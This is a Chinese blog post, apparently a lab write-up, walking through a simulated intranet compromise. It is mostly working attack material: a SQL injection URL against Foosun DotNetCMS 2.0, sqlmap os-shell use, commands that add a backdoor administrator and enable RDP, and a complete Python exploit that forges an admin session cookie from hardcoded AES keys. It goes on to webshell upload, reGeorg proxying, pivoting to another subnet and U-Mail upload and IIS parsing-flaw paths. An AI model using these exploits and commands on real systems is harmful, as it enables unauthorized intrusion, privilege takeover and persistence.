• 记录一次【模仿真实环境】的内网漫游


    一阶段、

    信息收集

    通过NMAP进行端口扫描 发现网站开放了80,443,700,8080端口

    80端口下存在web服务 :Foosun DotNetCMS 2.0  网站为IIS搭建的aspx站  服务器操作系统为win2008

    8080端口下存在路由登录界面

    二、web渗透、

    浏览网站发现网站使用了FoosunCMS

    寻找相关漏洞

    www.text.com/user/City_ajax.aspx?CityId=1

    处存在sql注入

     

    http://192.168.31.55/user/City_ajax.aspx?CityId=1%27%20union%20all%20select%20UserNum,U

    serNum%20from%20dbo.fs_sys_User%20where%20UserName=%27admin

     

     

    Table: fs_sys_admin

    [1 entry]

    +--------------+

    | UserNum      |

    +--------------+

    | 327142054961 |

    +--------------+

    这里只跑出来了一个uerrnumber没有我们想要的后台账号和密码

    但是发现这个注入又写入权限

    不过   并不知道绝对路径

    然后我们利用--os-shell发现交互了一个shell并且是系统权限

    开启3389 并建立一个用户成功了

    并且我们获得权限的主机IP为192.168.1.123

    网关为192.168.1.1

    net user szg 123456 /add & net localgroup administrators szg /add

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

     

     

     接下来我们利用网上爆出的漏洞利用该usernum生成一个cookie

    脚本如下:

    #coding:utf-8
    import argparse
    import urllib
    import traceback
    import base64
    from Crypto.Cipher import AES
    from binascii import b2a_hex, a2b_hex
    ###############################
    ##search keyword: ##
    ##inurl:/manage/Login.aspx ##
    ###############################
    KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'
    IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'
    def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")
    return parser.parse_args()
    def run(url):
    try:
    usernumber = get_usernumber(url)
    if usernumber is not None:
    encrypt_cookie = generate_cookie(usernumber)
    #写入cookie中
    write_cookie(url, encrypt_cookie)
    except Exception:
    traceback.print_exc()
    def get_usernumber(url):
    fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"
    content = urllib.urlopen(fullurl).read()
    index = content.index("<option value="")
    if index != -1:
    usernumber = content[index+15:]
    usernumber = usernumber[0: content.index(""")+1]
    print "Get usernumber success. Usernumber is :", usernumber
    return usernumber
    else:
    print "Get usernumber fail"
    return None
    def pkcs7padding(data):
    bs = AES.block_size
    padding = bs - len(data) % bs
    padding_text = chr(padding) * padding
    return data + padding_text
    def generate_cookie(usernumber):
    orgstr = "%s,admin,0,1,False"%(usernumber,)
    cryptor = AES.new(KEY[0:32], AES.MODE_CBC, IV[0:16])
    ciphertext = cryptor.encrypt(pkcs7padding(orgstr))
    ciphertext = base64.b64encode(ciphertext)
    return ciphertext
    def write_cookie(url, ciphercookie):
    print "Generate Cookie[SITEINFO]:", ciphercookie
    print "Now you can write cookie and access the url: %s/manage/index.aspx"%(url,)
    if __name__ == '__main__':
    args = parse_args()
    try:
    if args.url is not None:
    run(args.url[0])
    except Exception, e:
    print "python Foosun_exp.py -u [url]"

     ###这里python运行该脚本需要加载一个模块忘了叫啥了提示的时候百度一下那个名字然后 pip  install  

    接下来利用谷歌浏览器的

    EditThisCookie插件利用该cookie登陆后台

    成功登陆到后台

    上传一句话之后发现链接上了一句话显示200却没有回显

    但是利用reGeorg挂了个代理成功了

    这时候我们拿到了代理权限并且添加了管理员账户(这里具体请看我的另一篇文章https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html)

    这时候就可以连接3389了

    在远程连接的主机192.168.1.123中

    翻到了管理员记录的密码

     

    接下来利用获得的密码试着登陆8080端口一下发现限制了IP

    利用代理继续登陆

     挂代理之后成功登陆

    三、内网漫游、

    这里我们在路由中发现了另一个网段

     

    如果没有进行Vlan的划分那么我们的192.168.1.123就可以ping通172.19.23.123

    接下来扫描端口并访问172.19.23.123下的网站

    利用之前3389连接远程珠桌面获得的密码进行登陆

    同样利用u-mail的漏洞进行渗透

    该漏洞的上传路径为http://172.19.23.123/webmail/client/cache/userid/重命名序号

    http://172.19.23.123/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=xgk

     

    构造上传页面调用上传接口

     

     利用iis的解析漏洞+/1.php访问(????不是ngix解析漏洞吗??  不 !IIS也可以)

    http://172.19.23.123/webmail/client/cache/3/15598087978.jpg/1.php

  • 相关阅读:
    认证授权
    shell
    web漏洞
    java总结
    gp表和mapping表的使用
    循环发送消息器
    Arduino学习笔记
    正则表达式(绝对干货,亲测可用)
    springboot 错误求解决
    jdbc连接数据库以及crud(简单易懂,本人亲测可用 有源代码和数据库)
  • 原文地址:https://www.cnblogs.com/xiaoyunxiaogang/p/10994590.html
Copyright © 2020-2023  润新知